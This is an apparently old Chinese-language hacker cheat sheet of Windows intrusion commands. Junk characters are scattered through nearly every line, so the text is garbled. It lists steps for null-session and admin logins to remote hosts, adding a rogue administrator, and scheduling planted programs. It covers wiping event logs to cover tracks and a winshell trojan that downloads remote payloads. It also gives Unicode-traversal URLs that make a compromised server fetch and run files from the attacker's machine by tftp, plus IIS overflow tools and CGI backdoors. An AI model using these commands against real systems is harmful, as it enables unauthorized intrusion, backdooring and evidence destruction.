网管和黑客都必须知道的命令
"BfmX0&? 常用的几条NET命令:
`>EvT7u 5 hadA>d (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
E}vO*ZZEw :fVMM7 (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
'f7
*RSKqb ydqmuZ%2h# (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
]q7 LoH'S +%\j$Pv (查看远程主机时间) net time \\IP地址
7U`S9DDwq #
pB:LPEsK (定时启动某个程序) at \\IP地址 02:18 readme.exe
=DTOI /B\-DP3K (查看共享) net view \\IP地址
]U1,NhZu 4`P2FnJ? (查看netbios工作组列表) nbtstat -A IP地址
O)JUY*&I5 EJ ~kZ3 (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
Q9xx/tUW )$h9Y (这两条把自己增加到管理员组): net user 用户名 密码 /add
AE4~M`6D 7XWBI\SW net localgroup Administrators 用户名 /add
$,,>R[; w hYXZ21(K# (断开连接) net use \\IP地址\ipc$ /delete
|kNGpwpI ' VEr4& 扫尾:
U.7y8#qf3R `N.$LY;8 del C:\winnt\system32\logfiles\*.*
eoe^t:5& Qr%Jm{_o del C:\winnt\ssytem32\config\*.evt
>[fVl8G_0 G0
/vn9& del C:\winnt\system32\dtclog\*.*
tm1UH 4 5 t`ap del C:\winnt\system32\*.log
^+Vk#_2Q YQ@6innT del C:\winnt\system32\*.txt
L##8+OJ.L
pl,Z del C:\winnt\*.txt
lJzy)ne ^%%5 del C:\winnt\*.log
>-@ U_p CCh8? sM 一、netsvc.exe
Y0B1xL@ m?VRX.> 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
m_"p$m; 9N
D+w6" netsvc /list \\IP地址
2ZG1n# _| netsvc schedule \\IP地址 /query
-+=:+LhSMb #H6g&)Z_ netsvc \\IP地址 schedule /start
j"IM,= [x<6v}fRn 二、OpenTelnet.exe
yD"0=\ xOL)Pjo/m 远程启动主机的Telnet服务,并绑定端口到7878,例如:
|^PLZ> "?SOBA!vy OpenTelnet \\IP地址 用户名 密码 1 7878
/Fo/_=FE 2 3Q$'qZw p 然后就可以telnet到主机的7878端口,进入DOS方式下:
*Cnq2=A]A 9S1Ti6A telnet IP地址 7878
)jk1S hyOm9WU 三、winshell.exe
&oeN#5Es8C <m>l-] 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
PNJe&q0* f>8B'%] p Path (查看winshell主程序的路径信息)
!rXcGj(k >WGP{ b reBoot (重新启动机器)
kWs+2j 9y^kb+ d shutDown (关闭机器)
?cO8'4 bq L8dU(P s Shell (执行后你就会看到可爱的“C:\>”)
>Qm<-g t[?a@S~6 x eXit (退出本次登录会话,此命令并不终止winshell的运行)
dm2CA0 3u4*ofjE5 CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
~y)bYG!G {M@@)27gW 四、3389登陆器,GUI方式登录远程主机的
kPO6gdwq$ bR'mV-2' 五、elsave.exe
_3.G\/>[K p/hvQyE 事件日志清除工具
|0L=8~M(j e?!L}^f6X elsave -s \\IP地址 -l "application" -C
w#xeua|*I# x[vBK8 elsave -s \\IP地址 -l "system" -C
~ThVap[* {Vxc6,= elsave -s \\IP地址 -l "security" -C
$U>/i@ D _hy{F%} 执行后成功清除应用程序日志,系统日志,安全日志
;+i'0$;*w l`b1%0y 六、hbulot.exe
Uvh~B^6 7$ =Y\P 开启win2kserver和winxp的3389服务
_r\$NgJIM ;P;"F21^> hbulot [/r]
e"fN~`NhY "!%wh6`>Md 使用/r表示安装完成后自动重起目标使设置生效。
[7gYd+s ?GO
SeV 七、nc.exe(netcat.exe)
j2} c~^CKgr~R9 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
H|;*_ X>Al:?`}N 想要连接到某处: nc [-options] hostname port[s] [ports] ...
h(@R]GUX }!%JYG^!D 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
~H^'al2PK /2;dH]o0 参数:
E dn[cH7 yB,{#nM>8 -e prog 程序重定向,一旦连接,就执行 [危险!!]
FxCZRo& g@~!kh,TH -g gateway source-routing hop point[s], up to 8
b mOqeUgB :zdEq")v -G num source-routing pointer: 4, 8, 12, ...
, 3X: ) y=AsgJ -h 帮助信息
ryxYcEM0 +T0op4 -i secs 延时的间隔
O' +"d%2' VL+N:wb> -l 监听模式,用于入站连接
;gDMl57PQ. Wy<[(Pd -n 指定数字的IP地址,不能用hostname
MpOR Gd ~|r~NO
7[ -o file 记录16进制的传输
mn]-rTr Eh\ 1O(a( -p port 本地端口号
Al7<s B.$PhmCG -r 任意指定本地及远程端口
.,3Zj / ^rv"o:lF -s addr 本地源地址
z %x7fe )K~w'TUr -u UDP模式
.'|mY$U~] |3}5:k -v 详细输出——用两个-v可得到更详细的内容
2fl4h<V Hjs} -w secs timeout的时间
;%' b;+ TQP+>nS, -z 将输入输出关掉——用于扫描时
ha*X6R 八、TFTPD32.EXE
~>V-*NT8 $<B
+K 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
VFv9Q2/. |G(1[RNu http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
5Go0}'*% Dv&>*0B 然后可以直接令文件运行:
xS'zZ%? x#VyQ[ok http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
k$h [8l(< zJ9v%.e 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
dUS ZNY AZ[75> 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
)kYOHS 0rD#s{? 一、一 Xscan命令行运行参数说明:
mjb{~ Nbt GlSs8 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
AoBoFZLl3 9)`amhf> 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
}g`Gh|C 8L%M<JRg~ xscan -file <主机列表文件名> <检测项目> [其他选项]
-hWC_X:9jP Y\xUT>(J7 其中<检测项目> 含义如下:
x?"#gK`3; nnNv0?>d( -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
V!4a*,Pz l&Z
Sm -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
=SAV| dpwD8Q<
U -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
!@G)$g=< }j46L1T -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
.WvlaPK kbxg_UI; -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
9Bz0MUbrLl <l$P&jSF3 [其他选项] 含义如下:
Vtb1[cnna n`(~OO -v: 显示详细扫描进度
-4w%Iy |uI?ySF -p: 跳过Ping不通的主机
=m7H)z)i*J _%y4q%# -o: 跳过没有检测到开放端口的主机
k[\a)WcY8 o#>a 5 -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10